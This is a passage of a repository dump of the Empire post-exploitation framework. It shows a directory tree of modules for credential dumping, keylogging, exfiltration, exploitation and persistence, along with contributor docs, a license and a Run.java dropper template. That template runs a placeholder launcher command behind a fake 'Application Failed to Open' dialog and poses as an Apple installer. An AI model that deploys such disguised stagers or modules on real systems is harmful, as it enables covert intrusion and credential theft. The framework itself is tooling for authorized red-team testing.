├── .github
    ├── CONTRIBUTING.md
    └── ISSUE_TEMPLATE.md
├── .gitignore
├── LICENSE
├── README.md
├── changelog
├── data
    ├── agent
    │   ├── agent.ps1
    │   ├── agent.py
    │   └── stagers
    │   │   ├── dropbox.ps1
    │   │   ├── dropbox.py
    │   │   ├── http.ps1
    │   │   ├── http.py
    │   │   ├── http_com.ps1
    │   │   └── http_mapi.ps1
    ├── misc
    │   ├── ReflectivePick_x64_orig.dll
    │   ├── ReflectivePick_x86_orig.dll
    │   ├── Run.java
    │   ├── apptemplateResources
    │   │   ├── empty
    │   │   │   └── macho
    │   │   ├── icon
    │   │   │   └── stormtrooper.icns
    │   │   ├── x64
    │   │   │   └── launcher.app
    │   │   │   │   └── Contents
    │   │   │   │       ├── Info.plist
    │   │   │   │       ├── MacOS
    │   │   │   │           └── launcher
    │   │   │   │       ├── PkgInfo
    │   │   │   │       ├── Resources
    │   │   │   │           └── Base.lproj
    │   │   │   │           │   └── MainMenu.nib
    │   │   │   │       └── _CodeSignature
    │   │   │   │           └── CodeResources
    │   │   └── x86
    │   │   │   └── launcher.app
    │   │   │       └── Contents
    │   │   │           ├── Info.plist
    │   │   │           ├── MacOS
    │   │   │               └── launcher
    │   │   │           ├── PkgInfo
    │   │   │           ├── Resources
    │   │   │               └── Base.lproj
    │   │   │               │   └── MainMenu.nib
    │   │   │           └── _CodeSignature
    │   │   │               └── CodeResources
    │   ├── hijackers
    │   │   ├── template.dylib
    │   │   └── template64.dylib
    │   ├── hop.php
    │   ├── inactive_modules
    │   │   └── redirector.py
    │   ├── machotemplate
    │   ├── pkgbuild
    │   │   ├── expand
    │   │   │   └── PackageInfo
    │   │   ├── root
    │   │   │   └── Applications
    │   │   │   │   └── test
    │   │   └── scripts
    │   │   │   └── postinstall
    │   ├── templateLauncher.dylib
    │   ├── templateLauncher64.dylib
    │   ├── templateSource
    │   │   ├── Dylib.c
    │   │   └── macho.m
    │   └── xar-1.5.2.tar.gz
    ├── module_source
    │   ├── code_execution
    │   │   ├── Invoke-DllInjection.ps1
    │   │   ├── Invoke-MetasploitPayload.ps1
    │   │   ├── Invoke-Ntsd.ps1
    │   │   ├── Invoke-ReflectivePEInjection.ps1
    │   │   ├── Invoke-Shellcode.ps1
    │   │   ├── Invoke-ShellcodeMSIL.ps1
    │   │   ├── ntsd_x64.exe
    │   │   ├── ntsd_x86.exe
    │   │   ├── ntsdexts_x64.dll
    │   │   └── ntsdexts_x86.dll
    │   ├── collection
    │   │   ├── Get-BrowserData.ps1
    │   │   ├── Get-ChromeDump.ps1
    │   │   ├── Get-ClipboardContents.ps1
    │   │   ├── Get-FoxDump.ps1
    │   │   ├── Get-IndexedItem.ps1
    │   │   ├── Get-Keystrokes.ps1
    │   │   ├── Get-SQLColumnSampleData.ps1
    │   │   ├── Get-SQLQuery.ps1
    │   │   ├── Get-Screenshot.ps1
    │   │   ├── Get-USBKeystrokes.ps1
    │   │   ├── Invoke-Inveigh.ps1
    │   │   ├── Invoke-NetRipper.ps1
    │   │   ├── Invoke-NinjaCopy.ps1
    │   │   ├── Out-Minidump.ps1
    │   │   └── vaults
    │   │   │   ├── KeePassConfig.ps1
    │   │   │   └── KeeThief.ps1
    │   ├── credentials
    │   │   ├── Get-VaultCredential.ps1
    │   │   ├── Invoke-CredentialInjection.ps1
    │   │   ├── Invoke-DCSync.ps1
    │   │   ├── Invoke-Kerberoast.ps1
    │   │   ├── Invoke-Mimikatz.ps1
    │   │   ├── Invoke-PowerDump.ps1
    │   │   ├── Invoke-SessionGopher.ps1
    │   │   ├── Invoke-TokenManipulation.ps1
    │   │   └── dumpCredStore.ps1
    │   ├── exfil
    │   │   ├── Invoke-EgressCheck.ps1
    │   │   ├── Invoke-ExfilDataToGitHub.ps1
    │   │   └── Invoke-PostExfil.ps1
    │   ├── exploitation
    │   │   ├── Exploit-EternalBlue.ps1
    │   │   ├── Exploit-JBoss.ps1
    │   │   └── Exploit-Jenkins.ps1
    │   ├── fun
    │   │   ├── Invoke-Thunderstruck.ps1
    │   │   ├── Invoke-VoiceTroll.ps1
    │   │   └── Set-Wallpaper.ps1
    │   ├── lateral_movement
    │   │   ├── Invoke-DCOM.ps1
    │   │   ├── Invoke-ExecuteMSBuild.ps1
    │   │   ├── Invoke-InveighRelay.ps1
    │   │   ├── Invoke-PsExec.ps1
    │   │   ├── Invoke-SQLOSCmd.ps1
    │   │   └── Invoke-SSHCommand.ps1
    │   ├── management
    │   │   ├── Invoke-PSInject.ps1
    │   │   ├── Invoke-ReflectivePEInjection.ps1
    │   │   ├── Invoke-RunAs.ps1
    │   │   ├── Invoke-Vnc.ps1
    │   │   ├── MailRaider.ps1
    │   │   ├── New-HoneyHash.ps1
    │   │   └── Set-MacAttribute.ps1
    │   ├── persistence
    │   │   ├── Get-SecurityPackages.ps1
    │   │   ├── Install-SSP.ps1
    │   │   ├── Invoke-BackdoorLNK.ps1
    │   │   ├── Persistence.psm1
    │   │   └── PowerBreach.ps1
    │   ├── privesc
    │   │   ├── Get-GPPPassword.ps1
    │   │   ├── Get-SiteListPassword.ps1
    │   │   ├── Get-System.ps1
    │   │   ├── Invoke-BypassUAC.ps1
    │   │   ├── Invoke-BypassUACTokenManipulation.ps1
    │   │   ├── Invoke-EnvBypass.ps1
    │   │   ├── Invoke-EventVwrBypass.ps1
    │   │   ├── Invoke-FodHelperBypass.ps1
    │   │   ├── Invoke-MS16032.ps1
    │   │   ├── Invoke-MS16135.ps1
    │   │   ├── Invoke-SDCLTBypass.ps1
    │   │   ├── Invoke-Tater.ps1
    │   │   ├── Invoke-WScriptBypassUAC.ps1
    │   │   └── PowerUp.ps1
    │   ├── python
    │   │   └── lateral_movement
    │   │   │   └── socks_source.py
    │   ├── recon
    │   │   ├── Find-Fruit.ps1
    │   │   ├── Get-SQLServerLoginDefaultPw.ps1
    │   │   └── HTTP-Login.ps1
    │   ├── situational_awareness
    │   │   ├── host
    │   │   │   ├── Find-TrustedDocuments.ps1
    │   │   │   ├── Get-ComputerDetails.ps1
    │   │   │   ├── Get-SystemDNSServer.ps1
    │   │   │   ├── Invoke-Paranoia.ps1
    │   │   │   ├── Invoke-WinEnum.ps1
    │   │   │   └── Start-MonitorTCPConnections.ps1
    │   │   └── network
    │   │   │   ├── BloodHound.ps1
    │   │   │   ├── Get-SPN.ps1
    │   │   │   ├── Get-SQLInstanceDomain.ps1
    │   │   │   ├── Get-SQLServerInfo.ps1
    │   │   │   ├── Invoke-ARPScan.ps1
    │   │   │   ├── Invoke-Portscan.ps1
    │   │   │   ├── Invoke-ReverseDNSLookup.ps1
    │   │   │   ├── Invoke-SMBAutoBrute.ps1
    │   │   │   ├── Invoke-SmbScanner.ps1
    │   │   │   └── powerview.ps1
    │   └── trollsploit
    │   │   └── Get-RickAstley.ps1
    ├── obfuscated_module_source
    │   ├── code_execution
    │   │   └── .gitignore
    │   ├── collection
    │   │   ├── .gitignore
    │   │   └── vaults
    │   │   │   └── .gitignore
    │   ├── credentials
    │   │   └── .gitignore
    │   ├── exfil
    │   │   └── .gitignore
    │   ├── exploitation
    │   │   └── .gitignore
    │   ├── fun
    │   │   └── .gitignore
    │   ├── lateral_movement
    │   │   └── .gitignore
    │   ├── management
    │   │   └── .gitignore
    │   ├── persistence
    │   │   └── .gitignore
    │   ├── privesc
    │   │   └── .gitignore
    │   ├── recon
    │   │   └── .gitignore
    │   ├── situational_awareness
    │   │   ├── .gitignore
    │   │   ├── host
    │   │   │   └── .gitignore
    │   │   └── network
    │   │   │   └── .gitignore
    │   └── trollsploit
    │   │   └── .gitignore
    └── profiles
    │   ├── comfoo.txt
    │   ├── fiesta.txt
    │   ├── pitty_tiger.txt
    │   └── zeus.txt
├── empire
├── lib
    ├── __init__.py
    ├── common
    │   ├── __init__.py
    │   ├── agents.py
    │   ├── credentials.py
    │   ├── empire.py
    │   ├── encryption.py
    │   ├── helpers.py
    │   ├── http.py
    │   ├── listeners.py
    │   ├── messages.py
    │   ├── modules.py
    │   ├── packets.py
    │   ├── pylnk.py
    │   └── stagers.py
    ├── listeners
    │   ├── dbx.py
    │   ├── http.py
    │   ├── http_com.py
    │   ├── http_foreign.py
    │   ├── http_hop.py
    │   ├── http_mapi.py
    │   ├── meterpreter.py
    │   └── template.py
    ├── modules
    │   ├── exfiltration
    │   │   └── Invoke_ExfilDataToGitHub.py
    │   ├── external
    │   │   └── generate_agent.py
    │   ├── powershell
    │   │   ├── code_execution
    │   │   │   ├── invoke_dllinjection.py
    │   │   │   ├── invoke_metasploitpayload.py
    │   │   │   ├── invoke_ntsd.py
    │   │   │   ├── invoke_reflectivepeinjection.py
    │   │   │   ├── invoke_shellcode.py
    │   │   │   └── invoke_shellcodemsil.py
    │   │   ├── collection
    │   │   │   ├── ChromeDump.py
    │   │   │   ├── FoxDump.py
    │   │   │   ├── USBKeylogger.py
    │   │   │   ├── WebcamRecorder.py
    │   │   │   ├── browser_data.py
    │   │   │   ├── clipboard_monitor.py
    │   │   │   ├── file_finder.py
    │   │   │   ├── find_interesting_file.py
    │   │   │   ├── get_indexed_item.py
    │   │   │   ├── get_sql_column_sample_data.py
    │   │   │   ├── get_sql_query.py
    │   │   │   ├── inveigh.py
    │   │   │   ├── keylogger.py
    │   │   │   ├── minidump.py
    │   │   │   ├── netripper.py
    │   │   │   ├── ninjacopy.py
    │   │   │   ├── packet_capture.py
    │   │   │   ├── prompt.py
    │   │   │   ├── screenshot.py
    │   │   │   └── vaults
    │   │   │   │   ├── add_keepass_config_trigger.py
    │   │   │   │   ├── find_keepass_config.py
    │   │   │   │   ├── get_keepass_config_trigger.py
    │   │   │   │   ├── keethief.py
    │   │   │   │   └── remove_keepass_config_trigger.py
    │   │   ├── credentials
    │   │   │   ├── credential_injection.py
    │   │   │   ├── enum_cred_store.py
    │   │   │   ├── invoke_kerberoast.py
    │   │   │   ├── mimikatz
    │   │   │   │   ├── cache.py
    │   │   │   │   ├── certs.py
    │   │   │   │   ├── command.py
    │   │   │   │   ├── dcsync.py
    │   │   │   │   ├── dcsync_hashdump.py
    │   │   │   │   ├── extract_tickets.py
    │   │   │   │   ├── golden_ticket.py
    │   │   │   │   ├── logonpasswords.py
    │   │   │   │   ├── lsadump.py
    │   │   │   │   ├── mimitokens.py
    │   │   │   │   ├── pth.py
    │   │   │   │   ├── purge.py
    │   │   │   │   ├── sam.py
    │   │   │   │   ├── silver_ticket.py
    │   │   │   │   └── trust_keys.py
    │   │   │   ├── powerdump.py
    │   │   │   ├── sessiongopher.py
    │   │   │   ├── tokens.py
    │   │   │   └── vault_credential.py
    │   │   ├── exfiltration
    │   │   │   ├── egresscheck.py
    │   │   │   └── exfil_dropbox.py
    │   │   ├── exploitation
    │   │   │   ├── exploit_eternalblue.py
    │   │   │   ├── exploit_jboss.py
    │   │   │   └── exploit_jenkins.py
    │   │   ├── lateral_movement
    │   │   │   ├── inveigh_relay.py
    │   │   │   ├── invoke_dcom.py
    │   │   │   ├── invoke_executemsbuild.py
    │   │   │   ├── invoke_psexec.py
    │   │   │   ├── invoke_psremoting.py
    │   │   │   ├── invoke_sqloscmd.py
    │   │   │   ├── invoke_sshcommand.py
    │   │   │   ├── invoke_wmi.py
    │   │   │   ├── invoke_wmi_debugger.py
    │   │   │   ├── jenkins_script_console.py
    │   │   │   └── new_gpo_immediate_task.py
    │   │   ├── management
    │   │   │   ├── disable_rdp.py
    │   │   │   ├── downgrade_account.py
    │   │   │   ├── enable_multi_rdp.py
    │   │   │   ├── enable_rdp.py
    │   │   │   ├── get_domain_sid.py
    │   │   │   ├── honeyhash.py
    │   │   │   ├── invoke_script.py
    │   │   │   ├── lock.py
    │   │   │   ├── logoff.py
    │   │   │   ├── mailraider
    │   │   │   │   ├── disable_security.py
    │   │   │   │   ├── get_emailitems.py
    │   │   │   │   ├── get_subfolders.py
    │   │   │   │   ├── mail_search.py
    │   │   │   │   ├── search_gal.py
    │   │   │   │   ├── send_mail.py
    │   │   │   │   └── view_email.py
    │   │   │   ├── psinject.py
    │   │   │   ├── reflective_inject.py
    │   │   │   ├── restart.py
    │   │   │   ├── runas.py
    │   │   │   ├── sid_to_user.py
    │   │   │   ├── spawn.py
    │   │   │   ├── spawnas.py
    │   │   │   ├── switch_listener.py
    │   │   │   ├── timestomp.py
    │   │   │   ├── user_to_sid.py
    │   │   │   ├── vnc.py
    │   │   │   ├── wdigest_downgrade.py
    │   │   │   └── zipfolder.py
    │   │   ├── persistence
    │   │   │   ├── elevated
    │   │   │   │   ├── registry.py
    │   │   │   │   ├── schtasks.py
    │   │   │   │   ├── wmi.py
    │   │   │   │   └── wmi_updater.py
    │   │   │   ├── misc
    │   │   │   │   ├── add_netuser.py
    │   │   │   │   ├── add_sid_history.py
    │   │   │   │   ├── debugger.py
    │   │   │   │   ├── disable_machine_acct_change.py
    │   │   │   │   ├── get_ssps.py
    │   │   │   │   ├── install_ssp.py
    │   │   │   │   ├── memssp.py
    │   │   │   │   └── skeleton_key.py
    │   │   │   ├── powerbreach
    │   │   │   │   ├── deaduser.py
    │   │   │   │   ├── eventlog.py
    │   │   │   │   └── resolver.py
    │   │   │   └── userland
    │   │   │   │   ├── backdoor_lnk.py
    │   │   │   │   ├── registry.py
    │   │   │   │   └── schtasks.py
    │   │   ├── privesc
    │   │   │   ├── ask.py
    │   │   │   ├── bypassuac.py
    │   │   │   ├── bypassuac_env.py
    │   │   │   ├── bypassuac_eventvwr.py
    │   │   │   ├── bypassuac_fodhelper.py
    │   │   │   ├── bypassuac_sdctlbypass.py
    │   │   │   ├── bypassuac_tokenmanipulation.py
    │   │   │   ├── bypassuac_wscript.py
    │   │   │   ├── getsystem.py
    │   │   │   ├── gpp.py
    │   │   │   ├── mcafee_sitelist.py
    │   │   │   ├── ms16-032.py
    │   │   │   ├── ms16-135.py
    │   │   │   ├── powerup
    │   │   │   │   ├── allchecks.py
    │   │   │   │   ├── find_dllhijack.py
    │   │   │   │   ├── service_exe_restore.py
    │   │   │   │   ├── service_exe_stager.py
    │   │   │   │   ├── service_exe_useradd.py
    │   │   │   │   ├── service_stager.py
    │   │   │   │   ├── service_useradd.py
    │   │   │   │   └── write_dllhijacker.py
    │   │   │   └── tater.py
    │   │   ├── recon
    │   │   │   ├── find_fruit.py
    │   │   │   ├── get_sql_server_login_default_pw.py
    │   │   │   └── http_login.py
    │   │   ├── situational_awareness
    │   │   │   ├── host
    │   │   │   │   ├── antivirusproduct.py
    │   │   │   │   ├── computerdetails.py
    │   │   │   │   ├── dnsserver.py
    │   │   │   │   ├── findtrusteddocuments.py
    │   │   │   │   ├── get_pathacl.py
    │   │   │   │   ├── get_proxy.py
    │   │   │   │   ├── get_uaclevel.py
    │   │   │   │   ├── monitortcpconnections.py
    │   │   │   │   ├── paranoia.py
    │   │   │   │   └── winenum.py
    │   │   │   └── network
    │   │   │   │   ├── arpscan.py
    │   │   │   │   ├── bloodhound.py
    │   │   │   │   ├── get_exploitable_system.py
    │   │   │   │   ├── get_spn.py
    │   │   │   │   ├── get_sql_instance_domain.py
    │   │   │   │   ├── get_sql_server_info.py
    │   │   │   │   ├── portscan.py
    │   │   │   │   ├── powerview
    │   │   │   │       ├── find_computer_field.py
    │   │   │   │       ├── find_foreign_group.py
    │   │   │   │       ├── find_foreign_user.py
    │   │   │   │       ├── find_gpo_computer_admin.py
    │   │   │   │       ├── find_gpo_location.py
    │   │   │   │       ├── find_localadmin_access.py
    │   │   │   │       ├── find_managed_security_group.py
    │   │   │   │       ├── find_user_field.py
    │   │   │   │       ├── get_cached_rdpconnection.py
    │   │   │   │       ├── get_computer.py
    │   │   │   │       ├── get_dfs_share.py
    │   │   │   │       ├── get_domain_controller.py
    │   │   │   │       ├── get_domain_policy.py
    │   │   │   │       ├── get_domain_trust.py
    │   │   │   │       ├── get_fileserver.py
    │   │   │   │       ├── get_forest.py
    │   │   │   │       ├── get_forest_domain.py
    │   │   │   │       ├── get_gpo.py
    │   │   │   │       ├── get_gpo_computer.py
    │   │   │   │       ├── get_group.py
    │   │   │   │       ├── get_group_member.py
    │   │   │   │       ├── get_localgroup.py
    │   │   │   │       ├── get_loggedon.py
    │   │   │   │       ├── get_object_acl.py
    │   │   │   │       ├── get_ou.py
    │   │   │   │       ├── get_rdp_session.py
    │   │   │   │       ├── get_session.py
    │   │   │   │       ├── get_site.py
    │   │   │   │       ├── get_subnet.py
    │   │   │   │       ├── get_user.py
    │   │   │   │       ├── map_domain_trust.py
    │   │   │   │       ├── process_hunter.py
    │   │   │   │       ├── set_ad_object.py
    │   │   │   │       ├── share_finder.py
    │   │   │   │       └── user_hunter.py
    │   │   │   │   ├── reverse_dns.py
    │   │   │   │   ├── smbautobrute.py
    │   │   │   │   └── smbscanner.py
    │   │   └── trollsploit
    │   │   │   ├── get_schwifty.py
    │   │   │   ├── message.py
    │   │   │   ├── process_killer.py
    │   │   │   ├── rick_ascii.py
    │   │   │   ├── rick_astley.py
    │   │   │   ├── thunderstruck.py
    │   │   │   ├── voicetroll.py
    │   │   │   ├── wallpaper.py
    │   │   │   └── wlmdr.py
    │   ├── powershell_template.py
    │   ├── python
    │   │   ├── collection
    │   │   │   ├── linux
    │   │   │   │   ├── hashdump.py
    │   │   │   │   ├── keylogger.py
    │   │   │   │   ├── mimipenguin.py
    │   │   │   │   ├── pillage_user.py
    │   │   │   │   ├── sniffer.py
    │   │   │   │   └── xkeylogger.py
    │   │   │   └── osx
    │   │   │   │   ├── browser_dump.py
    │   │   │   │   ├── clipboard.py
    │   │   │   │   ├── hashdump.py
    │   │   │   │   ├── imessage_dump.py
    │   │   │   │   ├── kerberosdump.py
    │   │   │   │   ├── keychaindump.py
    │   │   │   │   ├── keychaindump_chainbreaker.py
    │   │   │   │   ├── keylogger.py
    │   │   │   │   ├── native_screenshot.py
    │   │   │   │   ├── pillage_user.py
    │   │   │   │   ├── prompt.py
    │   │   │   │   ├── screensaver_alleyoop.py
    │   │   │   │   ├── screenshot.py
    │   │   │   │   ├── search_email.py
    │   │   │   │   ├── sniffer.py
    │   │   │   │   └── webcam.py
    │   │   ├── exploit
    │   │   │   └── web
    │   │   │   │   └── jboss_jmx.py
    │   │   ├── lateral_movement
    │   │   │   └── multi
    │   │   │   │   ├── ssh_command.py
    │   │   │   │   └── ssh_launcher.py
    │   │   ├── management
    │   │   │   ├── multi
    │   │   │   │   ├── kerberos_inject.py
    │   │   │   │   ├── socks.py
    │   │   │   │   └── spawn.py
    │   │   │   └── osx
    │   │   │   │   ├── screen_sharing.py
    │   │   │   │   └── shellcodeinject64.py
    │   │   ├── persistence
    │   │   │   ├── multi
    │   │   │   │   └── crontab.py
    │   │   │   └── osx
    │   │   │   │   ├── CreateHijacker.py
    │   │   │   │   ├── RemoveDaemon.py
    │   │   │   │   ├── launchdaemonexecutable.py
    │   │   │   │   ├── loginhook.py
    │   │   │   │   └── mail.py
    │   │   ├── privesc
    │   │   │   ├── linux
    │   │   │   │   ├── linux_priv_checker.py
    │   │   │   │   └── unix_privesc_check.py
    │   │   │   ├── multi
    │   │   │   │   ├── bashdoor.py
    │   │   │   │   └── sudo_spawn.py
    │   │   │   ├── osx
    │   │   │   │   ├── dyld_print_to_file.py
    │   │   │   │   └── piggyback.py
    │   │   │   └── windows
    │   │   │   │   └── get_gpppasswords.py
    │   │   ├── situational_awareness
    │   │   │   ├── host
    │   │   │   │   ├── multi
    │   │   │   │   │   ├── SuidGuidSearch.py
    │   │   │   │   │   └── WorldWriteableFileSearch.py
    │   │   │   │   └── osx
    │   │   │   │   │   ├── HijackScanner.py
    │   │   │   │   │   └── situational_awareness.py
    │   │   │   └── network
    │   │   │   │   ├── active_directory
    │   │   │   │       ├── dscl_get_groupmembers.py
    │   │   │   │       ├── dscl_get_groups.py
    │   │   │   │       ├── dscl_get_users.py
    │   │   │   │       ├── get_computers.py
    │   │   │   │       ├── get_domaincontrollers.py
    │   │   │   │       ├── get_fileservers.py
    │   │   │   │       ├── get_groupmembers.py
    │   │   │   │       ├── get_groupmemberships.py
    │   │   │   │       ├── get_groups.py
    │   │   │   │       ├── get_ous.py
    │   │   │   │       ├── get_userinformation.py
    │   │   │   │       └── get_users.py
    │   │   │   │   ├── dcos
    │   │   │   │       ├── chronos_api_add_job.py
    │   │   │   │       ├── chronos_api_delete_job.py
    │   │   │   │       ├── chronos_api_start_job.py
    │   │   │   │       ├── etcd_crawler.py
    │   │   │   │       ├── marathon_api_create_start_app.py
    │   │   │   │       └── marathon_api_delete_app.py
    │   │   │   │   ├── find_fruit.py
    │   │   │   │   ├── gethostbyname.py
    │   │   │   │   ├── http_rest_api.py
    │   │   │   │   ├── port_scan.py
    │   │   │   │   └── smb_mount.py
    │   │   └── trollsploit
    │   │   │   └── osx
    │   │   │       ├── change_background.py
    │   │   │       ├── login_message.py
    │   │   │       ├── say.py
    │   │   │       └── thunderstruck.py
    │   ├── python_jobs_template.py
    │   └── python_template.py
    ├── powershell
    │   └── Invoke-Obfuscation
    │   │   ├── Invoke-Obfuscation.ps1
    │   │   ├── Invoke-Obfuscation.psd1
    │   │   ├── Invoke-Obfuscation.psm1
    │   │   ├── LICENSE
    │   │   ├── Out-EncodedAsciiCommand.ps1
    │   │   ├── Out-EncodedBXORCommand.ps1
    │   │   ├── Out-EncodedBinaryCommand.ps1
    │   │   ├── Out-EncodedHexCommand.ps1
    │   │   ├── Out-EncodedOctalCommand.ps1
    │   │   ├── Out-ObfuscatedStringCommand.ps1
    │   │   ├── Out-ObfuscatedTokenCommand.ps1
    │   │   ├── Out-PowerShellLauncher.ps1
    │   │   ├── Out-SecureStringCommand.ps1
    │   │   └── README.md
    └── stagers
    │   ├── multi
    │       ├── bash.py
    │       ├── launcher.py
    │       ├── pyinstaller.py
    │       └── war.py
    │   ├── osx
    │       ├── applescript.py
    │       ├── application.py
    │       ├── ducky.py
    │       ├── dylib.py
    │       ├── jar.py
    │       ├── launcher.py
    │       ├── macho.py
    │       ├── macro.py
    │       ├── pkg.py
    │       ├── safari_launcher.py
    │       └── teensy.py
    │   └── windows
    │       ├── bunny.py
    │       ├── dll.py
    │       ├── ducky.py
    │       ├── hta.py
    │       ├── launcher_bat.py
    │       ├── launcher_lnk.py
    │       ├── launcher_sct.py
    │       ├── launcher_vbs.py
    │       ├── macro.py
    │       ├── macroless_msword.py
    │       └── teensy.py
└── setup
    ├── cert.sh
    ├── install.sh
    ├── reset.sh
    └── setup_database.py


/.github/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | # How To Contribute
 2 | 
 3 | Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions.
 4 | 
 5 | 
 6 | ## Creating Github Issues
 7 | 
 8 | Please first review the existing Empire issues to see if the error was resolved with a fix in the development branch or if we chose not to fix the error for some reason.
 9 | 
10 | The more information you provide in a Github issue the easier it will be for us to track down and fix the problem:
11 | 
12 | * Please provide the version of Empire you are using.
13 | * Please provide the OS and Python versions that you are using.
14 | * Please describe the expected behavior and the encountered error.
15 |   * The more detail the better!
16 |   * Include any actions taken just prior to the error.
17 |   * Please post a screenshot of the error, a link to a Pastebin dump of the error, or embedded text of the error.
18 | * Any additional information.
19 | 
20 | 
21 | ## Submitting Modules
22 | 
23 | * Submit pull requests to the [dev branch](https://github.com/powershellempire/Empire/tree/dev). After testing, changes will be merged to master.
24 | * Base modules on the template at [./modules/template.py](https://github.com/PowerShellEmpire/Empire/blob/dev/lib/modules/template.py). **Note** that for some modules you may need to massage the output to get it into a nicely displayable text format [with Out-String](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L111).
25 | * Cite previous work in the **'Comments'** module section.
26 | * If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate **data/module_source/*** directory and [pulling the script contents into the module on tasking](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L85-L95).
27 | * Use [approved PowerShell verbs](https://technet.microsoft.com/en-us/library/ms714428(v=vs.85).aspx) for any functions.
28 | * PowerShell Version 2 compatibility is **STRONGLY** preferred. 
29 | * TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly.
30 | * For additional guidelines for your PowerShell code itself, check out the [PowerSploit style guide](https://github.com/PowerShellMafia/PowerSploit/blob/master/README.md).


--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE.md:
--------------------------------------------------------------------------------
 1 | ## Empire Version
 2 | 
 3 | 
 4 | ## OS Information (Linux flavor, Python version)
 5 | 
 6 | 
 7 | ## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
 8 | 
 9 | 
10 | ## Screenshot of error, embedded text output, or Pastebin link to the error
11 | 
12 | 
13 | ## Any additional information
14 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | data/empire.db
 2 | data/empire-chain.pem
 3 | data/empire-priv.key
 4 | empire.debug
 5 | *.pyc
 6 | downloads/*
 7 | .vscode/*
 8 | *.txt
 9 | LastTask*
10 | data/obfuscated_module_source/*.ps1
11 | data/misc/ToObfuscate.ps1
12 | data/misc/Obfuscated.ps1
13 | setup/xar*
14 | setup/bomutils/*
15 | .venv
16 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | Copyright (c) 2017, Will Schroeder, Justin Warner, Matt Nelson, Steve Borosh, Alex Rymdeko-harvey, Chris Ross
 2 | All rights reserved.
 3 | 
 4 | Redistribution and use in source and binary forms, with or without
 5 | modification, are permitted provided that the following conditions are met:
 6 | 
 7 | * Redistributions of source code must retain the above copyright notice, this
 8 |   list of conditions and the following disclaimer.
 9 | 
10 | * Redistributions in binary form must reproduce the above copyright notice,
11 |   this list of conditions and the following disclaimer in the documentation
12 |   and/or other materials provided with the distribution.
13 | 
14 | * Neither the name of Empire nor the names of its
15 |   contributors may be used to endorse or promote products derived from
16 |   this software without specific prior written permission.
17 | 
18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
19 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
20 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
22 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
23 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
25 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
26 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
27 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
28 | 
29 | 


--------------------------------------------------------------------------------
/data/misc/ReflectivePick_x64_orig.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/ReflectivePick_x64_orig.dll


--------------------------------------------------------------------------------
/data/misc/ReflectivePick_x86_orig.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/ReflectivePick_x86_orig.dll


--------------------------------------------------------------------------------
/data/misc/Run.java:
--------------------------------------------------------------------------------
 1 | package com.installer.apple;
 2 | 
 3 | import java.io.*;
 4 | import javax.swing.JOptionPane;
 5 | 
 6 | public class Run{
 7 |     public static void main(String[] args){
 8 | 
 9 |         String[] cmd = {
10 |             "/bin/bash",
11 |             "-c",
12 |             "LAUNCHER"
13 |         };
14 |         
15 |         try {
16 |             Process p = Runtime.getRuntime().exec(cmd);
17 |             JOptionPane.showMessageDialog(null, "Application Failed to Open", "Error", JOptionPane.INFORMATION_MESSAGE);
18 |         }
19 |         catch (IOException e){} 
20 |     }
21 | }


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/empty/macho:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/empty/macho


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/icon/stormtrooper.icns:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/icon/stormtrooper.icns


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/x64/launcher.app/Contents/Info.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>BuildMachineOSBuild</key>
 6 | 	<string>15G31</string>
 7 | 	<key>CFBundleDevelopmentRegion</key>
 8 | 	<string>en</string>
 9 | 	<key>CFBundleExecutable</key>
10 | 	<string>launcher</string>
11 | 	<key>CFBundleIdentifier</key>
12 | 	<string>com.apple.launcher</string>
13 | 	<key>CFBundleInfoDictionaryVersion</key>
14 | 	<string>6.0</string>
15 | 	<key>CFBundleName</key>
